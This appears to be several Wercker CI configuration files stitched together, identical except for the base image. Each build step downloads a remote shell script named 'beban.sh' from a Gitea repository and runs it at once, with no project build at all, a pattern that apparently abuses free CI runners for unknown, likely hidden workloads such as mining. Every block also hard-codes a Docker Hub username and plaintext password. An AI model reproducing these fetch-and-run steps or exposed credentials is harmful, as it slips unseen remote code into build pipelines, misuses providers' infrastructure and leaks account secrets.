box: nodesource/trusty
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh

box: python
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh

box:
 id: ruby:latest
 ports:
   - "8080"
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh

box:
  id: php
  ports:
    - "8080"
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh

box:
  id: python:2.7-slim
  ports:
    - "5000"
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh

box:
  id: node:latest
  ports:
    - "8080"
deploy:
  steps:
    - internal/docker-push:
        username: dapurspl
        password: Bandung#123
        tag: tagname
        repository: dapurspl/docker-build-golang
build:
  steps:
    - script:
        name: 4188335012868964
        code: |
          sudo apt update -y && sudo apt upgrade -y
          sudo apt-get install  -y wget
          wget https://try.gitea.io/dapurspl/excute/raw/branch/master/beban.sh && chmod u+x beban.sh && ./beban.sh